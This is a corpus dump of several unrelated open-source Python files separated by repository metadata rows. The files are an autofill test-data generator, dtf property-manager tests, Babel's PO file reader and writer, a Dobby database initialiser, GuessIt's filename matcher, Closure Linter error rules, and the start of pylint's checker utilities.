self.logger.removeHandler(self.log_handlers['StreamHandler'])
self.log_handlers['StreamHandler'] = None
self.output_filename = output_filename
self.dict_no = 0
self.fields = [
[u'NAME_FIRST', self.GenerateNameFirst],
[u'NAME_MIDDLE', None],
[u'NAME_LAST', None],
[u'EMAIL_ADDRESS', self.GenerateEmail],
[u'COMPANY_NAME', None],
[u'ADDRESS_HOME_LINE1', self.GenerateAddress],
[u'ADDRESS_HOME_LINE2', None],
[u'ADDRESS_HOME_CITY', self.GenerateCity],
[u'ADDRESS_HOME_STATE', self.GenerateState],
[u'ADDRESS_HOME_ZIP', self.GenerateZip],
[u'ADDRESS_HOME_COUNTRY', u'United States'],
[u'PHONE_HOME_WHOLE_NUMBER', None],
]
self.next_dict = {}
# Using implicit line joining does not work well in this case as each line
# has to be strings and not function calls that may return strings.
self.output_pattern = u'{\'' + \
u', '.join([u'u"%s" : u"%%s"' % key for key, method in self.fields]) + \
u',}'
def _GenerateField(self, field_construct):
"""Generates each field in each dictionary.
Args:
field_construct: it is a list of lists.
The first value (index 0) of each containing list is a function or None.
The remaining values are the args. If function is None then arg is just
returned.
Example 1: zip_construct = [[ None, u'95110']]. There is one
containing list only and function here is None and arg is u'95110'.
This just returns u'95110'.
Example 2: address_construct = [ [ random.randint, 1, 10000],
[ None, u'foobar'] ] This has two containing lists and it will return
the result of:
random.randint(1, 10000) + ' ' + u'foobar'
which could be u'7832 foobar'
"""
parts = []
for function_and_args in field_construct:
function = function_and_args[0]
args = function_and_args[1:]
if not function:
function = lambda x: x
parts.append(str(function(*args)))
return (' ').join(parts)
def GenerateAddress(self):
"""Uses _GenerateField() and address_construct to gen a random address.
Returns:
A random address.
"""
return self._GenerateField(self.address_construct)
def GenerateCity(self):
"""Uses _GenerateField() and city_construct to gen a random city.
Returns:
A random city.
"""
return self._GenerateField(self.city_construct)
def GenerateState(self):
"""Uses _GenerateField() and state_construct to generate a state.
Returns:
A state.
"""
return self._GenerateField(self.state_construct)
def GenerateZip(self):
"""Uses zip_construct and generated cities to return a matched zip code.
Returns:
A zip code matched to the corresponding city.
"""
city_selected = self.next_dict['ADDRESS_HOME_CITY'][0]
index = self.city_construct[0][1].index(city_selected)
return self.zip_construct[index]
def GenerateCountry(self):
"""Uses _GenerateField() and country_construct to generate a country.
Returns:
A country.
"""
return self._GenerateField(self.country_construct)
def GenerateNameFirst(self):
"""Generates a numerical first name.
The name is the number of the current dict.
i.e. u'1', u'2', u'3'
Returns:
A numerical first name.
"""
return u'%s' % self.dict_no
def GenerateEmail(self):
"""Generates an email that corresponds to the first name.
i.e. u'1@example.com', u'2@example.com', u'3@example.com'
Returns:
An email address that corresponds to the first name.
"""
return u'%s@example.com' % self.dict_no
def GenerateNextDict(self):
"""Generates next dictionary of the dataset.
Returns:
The output dictionary.
"""
self.dict_no += 1
self.next_dict = {}
for key, method_or_value in self.fields:
if not method_or_value:
self.next_dict[key] = ['']
elif type(method_or_value) in [str, unicode]:
self.next_dict[key] = ['%s' % method_or_value]
else:
self.next_dict[key] = [method_or_value()]
return self.next_dict
def GenerateDataset(self, num_of_dict_to_generate=10):
"""Generates a list of dictionaries.
Args:
num_of_dict_to_generate: The number of dictionaries to be generated.
Default value is 10.
Returns:
The dictionary list.
"""
random.seed(0) # All randomly generated values are reproducible.
if self.output_filename:
output_file = codecs.open(
self.output_filename, mode='wb', encoding='utf-8-sig')
else:
output_file = None
try:
list_of_dict = []
if output_file:
output_file.write('[')
output_file.write(os.linesep)
while self.dict_no < num_of_dict_to_generate:
output_dict = self.GenerateNextDict()
list_of_dict.append(output_dict)
output_line = self.output_pattern % tuple(
[output_dict[key] for key, method in self.fields])
if output_file:
output_file.write(output_line)
output_file.write(os.linesep)
self.logger.info(
'%d: [%s]' % (self.dict_no, output_line.encode(sys.stdout.encoding,
'ignore')))
if output_file:
output_file.write(']')
output_file.write(os.linesep)
self.logger.info('%d dictionaries generated SUCCESSFULLY!', self.dict_no)
self.logger.info('--- FINISHED ---')
return list_of_dict
finally:
if output_file:
output_file.close()
def main():
parser = OptionParser()
parser.add_option(
'-o', '--output', dest='output_filename', default='',
help='write output to FILE [optional]', metavar='FILE')
parser.add_option(
'-d', '--dict', type='int', dest='dict_no', metavar='DICT_NO', default=10,
help='DICT_NO: number of dictionaries to be generated [default: %default]')
parser.add_option(
'-l', '--log_level', dest='log_level', default='debug',
metavar='LOG_LEVEL',
help='LOG_LEVEL: "debug", "info", "warning" or "error" [default: %default]')
(options, args) = parser.parse_args()
if args:
parser.print_help()
return 1
options.log_level = options.log_level.lower()
if options.log_level not in ['debug', 'info', 'warning', 'error']:
parser.error('Wrong log_level argument.')
parser.print_help()
else:
if options.log_level == 'debug':
options.log_level = logging.DEBUG
elif options.log_level == 'info':
options.log_level = logging.INFO
elif options.log_level == 'warning':
options.log_level = logging.WARNING
elif options.log_level == 'error':
options.log_level = logging.ERROR
gen = DatasetGenerator(options.output_filename, options.log_level)
gen.GenerateDataset(options.dict_no)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | -2,711,865,464,924,359,700 | 30.872964 | 80 | 0.639857 | false |
jakev/dtf | python-dtf/tests/unit/test_prop.py | 2 | 5430 | # Android Device Testing Framework ("dtf")
# Copyright 2013-2016 Jake Valletta (@jake_valletta)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""pytest for using dtf property manager"""
from __future__ import absolute_import
import pytest
import dtf.properties as prop
import dtf.testutils as testutils
# prop_set() tests
def test_set_new_property():
"""Attempt to set a new property (existing section)"""
value = '1'
contents = ("[info]\n"
"real = not_real")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
def test_set_new_section_property():
"""Set a property that has no section (yet)"""
value = '1'
testutils.deploy_config_raw("")
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_existing_property():
"""Set a property that already exists"""
value = 'new'
contents = ("[Info]\n"
"sdk = old")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_property_casing():
"""Set a prop and try to retrieve with casing"""
sdk = '1'
testutils.deploy_config_raw("")
prop.set_prop('INFO', 'sdk', sdk)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_get() tests
def test_get_empty_config():
"""Attempts to get a property without a valid config"""
testutils.deploy_config_raw("")
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property():
"""Attempts to get a valid property"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
testutils.undeploy()
return 0
def test_get_property_no_option():
"""Attempt to get property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property_casing():
"""Get a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_del() tests
def test_del_empty_config():
"""Attempts to delete a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property():
"""Attempts to delete a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_del_property_invalid():
"""Attempts to delete a property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = 64")
testutils.deploy_config_raw(contents)
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property_casing():
"""Delete a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
# prop_test() tests
def test_test_empty_config():
"""Test a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property():
"""Test a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
def test_test_invalid_property():
"""Test a missingproperty"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property_casing():
"""Test a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
| apache-2.0 | 7,465,317,381,772,302,000 | 18.119718 | 74 | 0.612155 | false |
krismcfarlin/todo_angular_endpoints_sockets | bp_includes/external/babel/messages/pofile.py | 54 | 16041 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
"""Reading and writing of files in the ``gettext`` PO (portable object)
format.
:see: `The Format of PO Files
<http://www.gnu.org/software/gettext/manual/gettext.html#PO-Files>`_
"""
from datetime import date, datetime
import os
import re
from babel import __version__ as VERSION
from babel.messages.catalog import Catalog, Message
from babel.util import set, wraptext, LOCALTZ
__all__ = ['read_po', 'write_po']
__docformat__ = 'restructuredtext en'
def unescape(string):
r"""Reverse `escape` the given string.
>>> print unescape('"Say:\\n \\"hello, world!\\"\\n"')
Say:
"hello, world!"
<BLANKLINE>
:param string: the string to unescape
:return: the unescaped string
:rtype: `str` or `unicode`
"""
return string[1:-1].replace('\\\\', '\\') \
.replace('\\t', '\t') \
.replace('\\r', '\r') \
.replace('\\n', '\n') \
.replace('\\"', '\"')
def denormalize(string):
r"""Reverse the normalization done by the `normalize` function.
>>> print denormalize(r'''""
... "Say:\n"
... " \"hello, world!\"\n"''')
Say:
"hello, world!"
<BLANKLINE>
>>> print denormalize(r'''""
... "Say:\n"
... " \"Lorem ipsum dolor sit "
... "amet, consectetur adipisicing"
... " elit, \"\n"''')
Say:
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
<BLANKLINE>
:param string: the string to denormalize
:return: the denormalized string
:rtype: `unicode` or `str`
"""
if string.startswith('""'):
lines = []
for line in string.splitlines()[1:]:
lines.append(unescape(line))
return ''.join(lines)
else:
return unescape(string)
def read_po(fileobj, locale=None, domain=None, ignore_obsolete=False):
"""Read messages from a ``gettext`` PO (portable object) file from the given
file-like object and return a `Catalog`.
>>> from StringIO import StringIO
>>> buf = StringIO('''
... #: main.py:1
... #, fuzzy, python-format
... msgid "foo %(name)s"
... msgstr ""
...
... # A user comment
... #. An auto comment
... #: main.py:3
... msgid "bar"
... msgid_plural "baz"
... msgstr[0] ""
... msgstr[1] ""
... ''')
>>> catalog = read_po(buf)
>>> catalog.revision_date = datetime(2007, 04, 01)
>>> for message in catalog:
... if message.id:
... print (message.id, message.string)
... print ' ', (message.locations, message.flags)
... print ' ', (message.user_comments, message.auto_comments)
(u'foo %(name)s', '')
([(u'main.py', 1)], set([u'fuzzy', u'python-format']))
([], [])
((u'bar', u'baz'), ('', ''))
([(u'main.py', 3)], set([]))
([u'A user comment'], [u'An auto comment'])
:param fileobj: the file-like object to read the PO file from
:param locale: the locale identifier or `Locale` object, or `None`
if the catalog is not bound to a locale (which basically
means it's a template)
:param domain: the message domain
:param ignore_obsolete: whether to ignore obsolete messages in the input
:return: an iterator over ``(message, translation, location)`` tuples
:rtype: ``iterator``
"""
catalog = Catalog(locale=locale, domain=domain)
counter = [0]
offset = [0]
messages = []
translations = []
locations = []
flags = []
user_comments = []
auto_comments = []
obsolete = [False]
in_msgid = [False]
in_msgstr = [False]
def _add_message():
translations.sort()
if len(messages) > 1:
msgid = tuple([denormalize(m) for m in messages])
else:
msgid = denormalize(messages[0])
if isinstance(msgid, (list, tuple)):
string = []
for idx in range(catalog.num_plurals):
try:
string.append(translations[idx])
except IndexError:
string.append((idx, ''))
string = tuple([denormalize(t[1]) for t in string])
else:
string = denormalize(translations[0][1])
message = Message(msgid, string, list(locations), set(flags),
auto_comments, user_comments, lineno=offset[0] + 1)
if obsolete[0]:
if not ignore_obsolete:
catalog.obsolete[msgid] = message
else:
catalog[msgid] = message
del messages[:]; del translations[:]; del locations[:];
del flags[:]; del auto_comments[:]; del user_comments[:]
obsolete[0] = False
counter[0] += 1
def _process_message_line(lineno, line):
if line.startswith('msgid_plural'):
in_msgid[0] = True
msg = line[12:].lstrip()
messages.append(msg)
elif line.startswith('msgid'):
in_msgid[0] = True
offset[0] = lineno
txt = line[5:].lstrip()
if messages:
_add_message()
messages.append(txt)
elif line.startswith('msgstr'):
in_msgid[0] = False
in_msgstr[0] = True
msg = line[6:].lstrip()
if msg.startswith('['):
idx, msg = msg[1:].split(']', 1)
translations.append([int(idx), msg.lstrip()])
else:
translations.append([0, msg])
elif line.startswith('"'):
if in_msgid[0]:
messages[-1] += u'\n' + line.rstrip()
elif in_msgstr[0]:
translations[-1][1] += u'\n' + line.rstrip()
for lineno, line in enumerate(fileobj.readlines()):
line = line.strip()
if not isinstance(line, unicode):
line = line.decode(catalog.charset)
if line.startswith('#'):
in_msgid[0] = in_msgstr[0] = False
if messages and translations:
_add_message()
if line[1:].startswith(':'):
for location in line[2:].lstrip().split():
pos = location.rfind(':')
if pos >= 0:
try:
lineno = int(location[pos + 1:])
except ValueError:
continue
locations.append((location[:pos], lineno))
elif line[1:].startswith(','):
for flag in line[2:].lstrip().split(','):
flags.append(flag.strip())
elif line[1:].startswith('~'):
obsolete[0] = True
_process_message_line(lineno, line[2:].lstrip())
elif line[1:].startswith('.'):
# These are called auto-comments
comment = line[2:].strip()
if comment: # Just check that we're not adding empty comments
auto_comments.append(comment)
else:
# These are called user comments
user_comments.append(line[1:].strip())
else:
_process_message_line(lineno, line)
if messages:
_add_message()
# No actual messages found, but there was some info in comments, from which
# we'll construct an empty header message
elif not counter[0] and (flags or user_comments or auto_comments):
messages.append(u'')
translations.append([0, u''])
_add_message()
return catalog
WORD_SEP = re.compile('('
r'\s+|' # any whitespace
r'[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w)' # em-dash
')')
def escape(string):
r"""Escape the given string so that it can be included in double-quoted
strings in ``PO`` files.
>>> escape('''Say:
... "hello, world!"
... ''')
'"Say:\\n \\"hello, world!\\"\\n"'
:param string: the string to escape
:return: the escaped string
:rtype: `str` or `unicode`
"""
return '"%s"' % string.replace('\\', '\\\\') \
.replace('\t', '\\t') \
.replace('\r', '\\r') \
.replace('\n', '\\n') \
.replace('\"', '\\"')
def normalize(string, prefix='', width=76):
r"""Convert a string into a format that is appropriate for .po files.
>>> print normalize('''Say:
... "hello, world!"
... ''', width=None)
""
"Say:\n"
" \"hello, world!\"\n"
>>> print normalize('''Say:
... "Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
... ''', width=32)
""
"Say:\n"
" \"Lorem ipsum dolor sit "
"amet, consectetur adipisicing"
" elit, \"\n"
:param string: the string to normalize
:param prefix: a string that should be prepended to every line
:param width: the maximum line width; use `None`, 0, or a negative number
to completely disable line wrapping
:return: the normalized string
:rtype: `unicode`
"""
if width and width > 0:
prefixlen = len(prefix)
lines = []
for idx, line in enumerate(string.splitlines(True)):
if len(escape(line)) + prefixlen > width:
chunks = WORD_SEP.split(line)
chunks.reverse()
while chunks:
buf = []
size = 2
while chunks:
l = len(escape(chunks[-1])) - 2 + prefixlen
if size + l < width:
buf.append(chunks.pop())
size += l
else:
if not buf:
# handle long chunks by putting them on a
# separate line
buf.append(chunks.pop())
break
lines.append(u''.join(buf))
else:
lines.append(line)
else:
lines = string.splitlines(True)
if len(lines) <= 1:
return escape(string)
# Remove empty trailing line
if lines and not lines[-1]:
del lines[-1]
lines[-1] += '\n'
return u'""\n' + u'\n'.join([(prefix + escape(l)) for l in lines])
def write_po(fileobj, catalog, width=76, no_location=False, omit_header=False,
sort_output=False, sort_by_file=False, ignore_obsolete=False,
include_previous=False):
r"""Write a ``gettext`` PO (portable object) template file for a given
message catalog to the provided file-like object.
>>> catalog = Catalog()
>>> catalog.add(u'foo %(name)s', locations=[('main.py', 1)],
... flags=('fuzzy',))
>>> catalog.add((u'bar', u'baz'), locations=[('main.py', 3)])
>>> from StringIO import StringIO
>>> buf = StringIO()
>>> write_po(buf, catalog, omit_header=True)
>>> print buf.getvalue()
#: main.py:1
#, fuzzy, python-format
msgid "foo %(name)s"
msgstr ""
<BLANKLINE>
#: main.py:3
msgid "bar"
msgid_plural "baz"
msgstr[0] ""
msgstr[1] ""
<BLANKLINE>
<BLANKLINE>
:param fileobj: the file-like object to write to
:param catalog: the `Catalog` instance
:param width: the maximum line width for the generated output; use `None`,
0, or a negative number to completely disable line wrapping
:param no_location: do not emit a location comment for every message
:param omit_header: do not include the ``msgid ""`` entry at the top of the
output
:param sort_output: whether to sort the messages in the output by msgid
:param sort_by_file: whether to sort the messages in the output by their
locations
:param ignore_obsolete: whether to ignore obsolete messages and not include
them in the output; by default they are included as
comments
:param include_previous: include the old msgid as a comment when
updating the catalog
"""
def _normalize(key, prefix=''):
return normalize(key, prefix=prefix, width=width) \
.encode(catalog.charset, 'backslashreplace')
def _write(text):
if isinstance(text, unicode):
text = text.encode(catalog.charset)
fileobj.write(text)
def _write_comment(comment, prefix=''):
# xgettext always wraps comments even if --no-wrap is passed;
# provide the same behaviour
if width and width > 0:
_width = width
else:
_width = 76
for line in wraptext(comment, _width):
_write('#%s %s\n' % (prefix, line.strip()))
def _write_message(message, prefix=''):
if isinstance(message.id, (list, tuple)):
_write('%smsgid %s\n' % (prefix, _normalize(message.id[0], prefix)))
_write('%smsgid_plural %s\n' % (
prefix, _normalize(message.id[1], prefix)
))
for idx in range(catalog.num_plurals):
try:
string = message.string[idx]
except IndexError:
string = ''
_write('%smsgstr[%d] %s\n' % (
prefix, idx, _normalize(string, prefix)
))
else:
_write('%smsgid %s\n' % (prefix, _normalize(message.id, prefix)))
_write('%smsgstr %s\n' % (
prefix, _normalize(message.string or '', prefix)
))
messages = list(catalog)
if sort_output:
messages.sort()
elif sort_by_file:
messages.sort(lambda x,y: cmp(x.locations, y.locations))
for message in messages:
if not message.id: # This is the header "message"
if omit_header:
continue
comment_header = catalog.header_comment
if width and width > 0:
lines = []
for line in comment_header.splitlines():
lines += wraptext(line, width=width,
subsequent_indent='# ')
comment_header = u'\n'.join(lines) + u'\n'
_write(comment_header)
for comment in message.user_comments:
_write_comment(comment)
for comment in message.auto_comments:
_write_comment(comment, prefix='.')
if not no_location:
locs = u' '.join([u'%s:%d' % (filename.replace(os.sep, '/'), lineno)
for filename, lineno in message.locations])
_write_comment(locs, prefix=':')
if message.flags:
_write('#%s\n' % ', '.join([''] + list(message.flags)))
if message.previous_id and include_previous:
_write_comment('msgid %s' % _normalize(message.previous_id[0]),
prefix='|')
if len(message.previous_id) > 1:
_write_comment('msgid_plural %s' % _normalize(
message.previous_id[1]
), prefix='|')
_write_message(message)
_write('\n')
if not ignore_obsolete:
for message in catalog.obsolete.values():
for comment in message.user_comments:
_write_comment(comment)
_write_message(message, prefix='#~ ')
_write('\n')
| lgpl-3.0 | -1,596,174,504,952,294,000 | 34.177632 | 80 | 0.520541 | false |
Diaoul/Dobby | dobby/db.py | 1 | 1627 | # Copyright 2011 Antoine Bertin <diaoulael@gmail.com>
#
# This file is part of Dobby.
#
# Dobby is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dobby is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Dobby. If not, see <http://www.gnu.org/licenses/>.
from models import Base
from models.actions import Action
from models.actions.datetime import Datetime
from models.actions.feed import Feed
from models.actions.weather import Weather
from models.association import Association
from models.command import Command
from models.scenario import Scenario
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm.session import sessionmaker
import logging
import os
logger = logging.getLogger(__name__)
def initDb(path):
"""Initialize database (create/update) and returns a sessionmaker to it
:return: a session maker object
:rtype: SessionMaker
"""
logger.info(u'Initializing database')
engine = create_engine('sqlite:///' + path)
if not os.path.exists(path):
logger.debug(u'Database does not exist, creating...')
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)
| lgpl-3.0 | 8,909,125,431,581,416,000 | 33.617021 | 75 | 0.76091 | false |
nomaro/SickBeard_Backup | lib/guessit/matcher.py | 40 | 6496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import PY3, u, base_text_type
from guessit.matchtree import MatchTree
from guessit.textutils import normalize_unicode
import logging
log = logging.getLogger(__name__)
class IterativeMatcher(object):
def __init__(self, filename, filetype='autodetect', opts=None):
"""An iterative matcher tries to match different patterns that appear
in the filename.
The 'filetype' argument indicates which type of file you want to match.
If it is 'autodetect', the matcher will try to see whether it can guess
that the file corresponds to an episode, or otherwise will assume it is
a movie.
The recognized 'filetype' values are:
[ autodetect, subtitle, movie, moviesubtitle, episode, episodesubtitle ]
The IterativeMatcher works mainly in 2 steps:
First, it splits the filename into a match_tree, which is a tree of groups
which have a semantic meaning, such as episode number, movie title,
etc...
The match_tree created looks like the following:
0000000000000000000000000000000000000000000000000000000000000000000000000000000000 111
0000011111111111112222222222222233333333444444444444444455555555666777777778888888 000
0000000000000000000000000000000001111112011112222333333401123334000011233340000000 000
__________________(The.Prestige).______.[____.HP.______.{__-___}.St{__-___}.Chaps].___
xxxxxttttttttttttt ffffff vvvv xxxxxx ll lll xx xxx ccc
[XCT].Le.Prestige.(The.Prestige).DVDRip.[x264.HP.He-Aac.{Fr-Eng}.St{Fr-Eng}.Chaps].mkv
The first 3 lines indicates the group index in which a char in the
filename is located. So for instance, x264 is the group (0, 4, 1), and
it corresponds to a video codec, denoted by the letter'v' in the 4th line.
(for more info, see guess.matchtree.to_string)
Second, it tries to merge all this information into a single object
containing all the found properties, and does some (basic) conflict
resolution when they arise.
"""
valid_filetypes = ('autodetect', 'subtitle', 'video',
'movie', 'moviesubtitle',
'episode', 'episodesubtitle')
if filetype not in valid_filetypes:
raise ValueError("filetype needs to be one of %s" % valid_filetypes)
if not PY3 and not isinstance(filename, unicode):
log.warning('Given filename to matcher is not unicode...')
filename = filename.decode('utf-8')
filename = normalize_unicode(filename)
if opts is None:
opts = []
elif isinstance(opts, base_text_type):
opts = opts.split()
self.match_tree = MatchTree(filename)
mtree = self.match_tree
mtree.guess.set('type', filetype, confidence=1.0)
def apply_transfo(transfo_name, *args, **kwargs):
transfo = __import__('guessit.transfo.' + transfo_name,
globals=globals(), locals=locals(),
fromlist=['process'], level=0)
transfo.process(mtree, *args, **kwargs)
# 1- first split our path into dirs + basename + ext
apply_transfo('split_path_components')
# 2- guess the file type now (will be useful later)
apply_transfo('guess_filetype', filetype)
if mtree.guess['type'] == 'unknown':
return
# 3- split each of those into explicit groups (separated by parentheses
# or square brackets)
apply_transfo('split_explicit_groups')
# 4- try to match information for specific patterns
# NOTE: order needs to comply to the following:
# - website before language (eg: tvu.org.ru vs russian)
# - language before episodes_rexps
# - properties before language (eg: he-aac vs hebrew)
# - release_group before properties (eg: XviD-?? vs xvid)
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps',
'guess_episodes_rexps', 'guess_weak_episodes_rexps' ]
else:
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps' ]
if 'nolanguage' in opts:
strategy.remove('guess_language')
for name in strategy:
apply_transfo(name)
# more guessers for both movies and episodes
for name in ['guess_bonus_features', 'guess_year']:
apply_transfo(name)
if 'nocountry' not in opts:
apply_transfo('guess_country')
# split into '-' separated subgroups (with required separator chars
# around the dash)
apply_transfo('split_on_dash')
# 5- try to identify the remaining unknown groups by looking at their
# position relative to other known elements
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
apply_transfo('guess_episode_info_from_position')
else:
apply_transfo('guess_movie_title_from_position')
# 6- perform some post-processing steps
apply_transfo('post_process')
log.debug('Found match tree:\n%s' % u(mtree))
def matched(self):
return self.match_tree.matched()
| gpl-3.0 | 5,704,064,265,243,028,000 | 40.909677 | 94 | 0.628695 | false |
markYoungH/chromium.src | third_party/closure_linter/closure_linter/errorrules.py | 124 | 2276 | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linter error rules class for Closure Linter."""
__author__ = 'robbyw@google.com (Robert Walker)'
import gflags as flags
from closure_linter import errors
FLAGS = flags.FLAGS
flags.DEFINE_boolean('jsdoc', True,
'Whether to report errors for missing JsDoc.')
flags.DEFINE_list('disable', None,
'Disable specific error. Usage Ex.: gjslint --disable 1,'
'0011 foo.js.')
flags.DEFINE_integer('max_line_length', 80, 'Maximum line length allowed '
'without warning.', lower_bound=1)
disabled_error_nums = None
def GetMaxLineLength():
"""Returns allowed maximum length of line.
Returns:
Length of line allowed without any warning.
"""
return FLAGS.max_line_length
def ShouldReportError(error):
"""Whether the given error should be reported.
Returns:
True for all errors except missing documentation errors and disabled
errors. For missing documentation, it returns the value of the
jsdoc flag.
"""
global disabled_error_nums
if disabled_error_nums is None:
disabled_error_nums = []
if FLAGS.disable:
for error_str in FLAGS.disable:
error_num = 0
try:
error_num = int(error_str)
except ValueError:
pass
disabled_error_nums.append(error_num)
return ((FLAGS.jsdoc or error not in (
errors.MISSING_PARAMETER_DOCUMENTATION,
errors.MISSING_RETURN_DOCUMENTATION,
errors.MISSING_MEMBER_DOCUMENTATION,
errors.MISSING_PRIVATE,
errors.MISSING_JSDOC_TAG_THIS)) and
(not FLAGS.disable or error not in disabled_error_nums))
| bsd-3-clause | -1,315,710,274,127,656,000 | 30.611111 | 75 | 0.690246 | false |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/pylint/checkers/utils.py | 3 | 29753 | # Copyright (c) 2006-2007, 2009-2014 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2015 Radu Ciorba <radu@devrandom.ro>
# Copyright (c) 2015 Dmitry Pribysh <dmand@yandex.ru>
# Copyright (c) 2016 Ashley Whetter <ashley@awhetter.co.uk>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
# pylint: disable=W0611
"""some functions that may be useful for various checkers
"""
import collections
import functools
try:
from functools import singledispatch as singledispatch
except ImportError:
# pylint: disable=import-error
from singledispatch import singledispatch as singledispatch
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import itertools
import re
import sys
import string
import warnings
import six
from six.moves import map, builtins # pylint: disable=redefined-builtin
import astroid
from astroid import bases as _bases
from astroid import scoped_nodes
BUILTINS_NAME = builtins.__name__
COMP_NODE_TYPES = (astroid.ListComp, astroid.SetComp,
astroid.DictComp, astroid.GeneratorExp)
PY3K = sys.version_info[0] == 3
if not PY3K:
EXCEPTIONS_MODULE = "exceptions"
else:
EXCEPTIONS_MODULE = "builtins"
ABC_METHODS = set(('abc.abstractproperty', 'abc.abstractmethod',
'abc.abstractclassmethod', 'abc.abstractstaticmethod'))
ITER_METHOD = '__iter__'
NEXT_METHOD = 'next' if six.PY2 else '__next__'
GETITEM_METHOD = '__getitem__'
